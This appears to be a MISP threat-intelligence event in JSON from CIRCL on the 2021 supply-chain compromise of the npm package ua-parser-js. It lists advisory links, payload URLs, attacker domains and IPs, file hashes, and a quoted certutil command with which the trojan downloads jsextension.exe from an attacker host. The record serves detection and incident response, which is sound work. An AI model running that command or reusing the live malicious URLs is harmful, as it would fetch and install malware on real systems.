562 lines
No EOL
20 KiB
JSON
562 lines
No EOL
20 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "2",
|
|
"date": "2021-10-24",
|
|
"extends_uuid": "",
|
|
"info": "Malware Discovered in Popular NPM Package, ua-parser-js",
|
|
"publish_timestamp": "1635064007",
|
|
"published": true,
|
|
"threat_level_id": "2",
|
|
"timestamp": "1635063955",
|
|
"uuid": "ad7665ec-fef2-44eb-a019-b1b25a8aec05",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#004646",
|
|
"local": "0",
|
|
"name": "type:OSINT",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0071c3",
|
|
"local": "0",
|
|
"name": "osint:lifetime=\"perpetual\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0087e8",
|
|
"local": "0",
|
|
"name": "osint:certainty=\"50\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": "0",
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#053a00",
|
|
"local": "0",
|
|
"name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": "0",
|
|
"name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635061972",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
|
"value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062091",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325",
|
|
"value": "https://github.com/faisalman/ua-parser-js/issues/536"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062310",
|
|
"to_ids": false,
|
|
"type": "url",
|
|
"uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
|
"value": "http://159.148.186.228/download/jsextension.exe"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062343",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
|
|
"value": "https://citationsherbe.at/sdd.dll"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062385",
|
|
"to_ids": true,
|
|
"type": "domain",
|
|
"uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
|
"value": "citationsherbe.at"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062444",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1b1a28a9-2b47-43a3-92b9-c9353497f429",
|
|
"value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "jsextension.exe",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1635062474",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "9163b990-5b87-413c-a8e7-f616b908157f",
|
|
"value": "47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Metadata used to generate an executive level report",
|
|
"meta-category": "misc",
|
|
"name": "report",
|
|
"template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
|
|
"template_version": "4",
|
|
"timestamp": "1635063955",
|
|
"uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
|
"referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"relationship_type": "alerts",
|
|
"timestamp": "1635063955",
|
|
"uuid": "892ba669-5323-41f2-b7bf-9093d813aea2"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "link",
|
|
"timestamp": "1635061938",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8",
|
|
"value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "summary",
|
|
"timestamp": "1635061938",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424",
|
|
"value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js."
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "type",
|
|
"timestamp": "1635061938",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601",
|
|
"value": "Alert"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1635063837",
|
|
"uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
|
"referenced_uuid": "e1f2c049-da88-4238-9dde-4134209c1364",
|
|
"relationship_type": "is-in-relation-with",
|
|
"timestamp": "1635062957",
|
|
"uuid": "97af4dfa-5d0a-47c5-ba72-e00f65c25482"
|
|
},
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
|
"referenced_uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
|
"relationship_type": "downloads",
|
|
"timestamp": "1635063003",
|
|
"uuid": "e205642b-21b0-4daa-a28f-275219dba1ba"
|
|
},
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
|
"referenced_uuid": "9163b990-5b87-413c-a8e7-f616b908157f",
|
|
"relationship_type": "related-to",
|
|
"timestamp": "1635063837",
|
|
"uuid": "d3629ef3-282a-4527-813e-ec8fa5be906d"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1635062024",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "974258e7-2e79-413c-9be8-08698653b87b",
|
|
"value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1635062024",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240",
|
|
"value": "The trojan try to execute in the cmd"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1635063109",
|
|
"uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "Checking the date range of vulnerable packages",
|
|
"object_uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
|
"referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"relationship_type": "identifies",
|
|
"timestamp": "1635063109",
|
|
"uuid": "7b9af0b8-1e55-4ac8-ad04-5b96b576fc98"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1635062225",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec",
|
|
"value": "npm show ua-parser-js time",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0fbf00",
|
|
"local": "0",
|
|
"name": "cycat:scope=\"detection\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1635062193",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "542061ee-8993-44ef-8261-f27f25dc9067",
|
|
"value": "To check the time when the package was installed"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "A domain/hostname and IP address seen as a tuple in a specific time frame.",
|
|
"meta-category": "network",
|
|
"name": "domain-ip",
|
|
"template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
|
|
"template_version": "10",
|
|
"timestamp": "1635063682",
|
|
"uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
|
|
"referenced_uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
|
"relationship_type": "is-in-relation-with",
|
|
"timestamp": "1635063351",
|
|
"uuid": "83bd1f6f-8d62-4da9-a6d5-4f74d5ea48e1"
|
|
},
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
|
|
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
|
|
"relationship_type": "related-to",
|
|
"timestamp": "1635063682",
|
|
"uuid": "177395ef-d715-4122-97ca-be60b7b975fb"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "domain",
|
|
"timestamp": "1635062540",
|
|
"to_ids": true,
|
|
"type": "domain",
|
|
"uuid": "75318d44-9526-43f4-9f8c-c24edf26a83f",
|
|
"value": "citationsherbe.at"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "ip",
|
|
"timestamp": "1635062540",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "dc052f3a-24fa-4595-8deb-6efb68b59d64",
|
|
"value": "95.213.165.20"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "A domain/hostname and IP address seen as a tuple in a specific time frame.",
|
|
"meta-category": "network",
|
|
"name": "domain-ip",
|
|
"template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
|
|
"template_version": "10",
|
|
"timestamp": "1635062582",
|
|
"uuid": "e1f2c049-da88-4238-9dde-4134209c1364",
|
|
"Attribute": [
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "ip",
|
|
"timestamp": "1635062582",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "2c40cba0-709f-42e0-8f09-9373862a40ac",
|
|
"value": "159.148.186.228"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1635063704",
|
|
"uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"referenced_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
|
"relationship_type": "executes",
|
|
"timestamp": "1635062818",
|
|
"uuid": "73a1835e-a0dc-40f2-a86a-172af4025954"
|
|
},
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
|
|
"relationship_type": "downloads",
|
|
"timestamp": "1635063384",
|
|
"uuid": "9f095fe7-ced7-4685-942b-5cbfa35b32c4"
|
|
},
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
|
"referenced_uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325",
|
|
"relationship_type": "describes",
|
|
"timestamp": "1635063704",
|
|
"uuid": "2a6e821d-81d7-45a6-b420-f8929fc38035"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "pattern-in-file",
|
|
"timestamp": "1635062757",
|
|
"to_ids": true,
|
|
"type": "pattern-in-file",
|
|
"uuid": "fbc77d66-169a-48bb-82c5-7ce5c847e205",
|
|
"value": "ua-parser-js"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1635063451",
|
|
"uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
|
"referenced_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1635063452",
|
|
"uuid": "e0b56508-2235-4dd3-ad3f-ebf948afa2bf"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1635062444",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1b724674-e8c6-4deb-a32b-b6cf86b591a6",
|
|
"value": "de8b54a938ac18f15cad804d79a0e19d"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1635062444",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "88ee0d56-6d8a-4869-9443-1dbe333121c2",
|
|
"value": "b6004c62e2d9dbad9cfd5f7e18647ac983788766"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1635062444",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "22a01316-f9ba-4889-9d29-eaf021bb104b",
|
|
"value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "4",
|
|
"timestamp": "1635063777",
|
|
"uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
|
|
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
|
|
"relationship_type": "related-to",
|
|
"timestamp": "1635063777",
|
|
"uuid": "3055c698-4f96-41d1-819b-26520b4b5eea"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1635062444",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed",
|
|
"value": "2021-10-24T04:03:55+00:00"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1635062444",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11",
|
|
"value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235"
|
|
},
|
|
{
|
|
"category": "Artifacts dropped",
|
|
"comment": "sdd.dll",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1635062444",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c",
|
|
"value": "23/50"
|
|
}
|
|
]
|
|
}
|
|
]
|
|
}
|
|
} |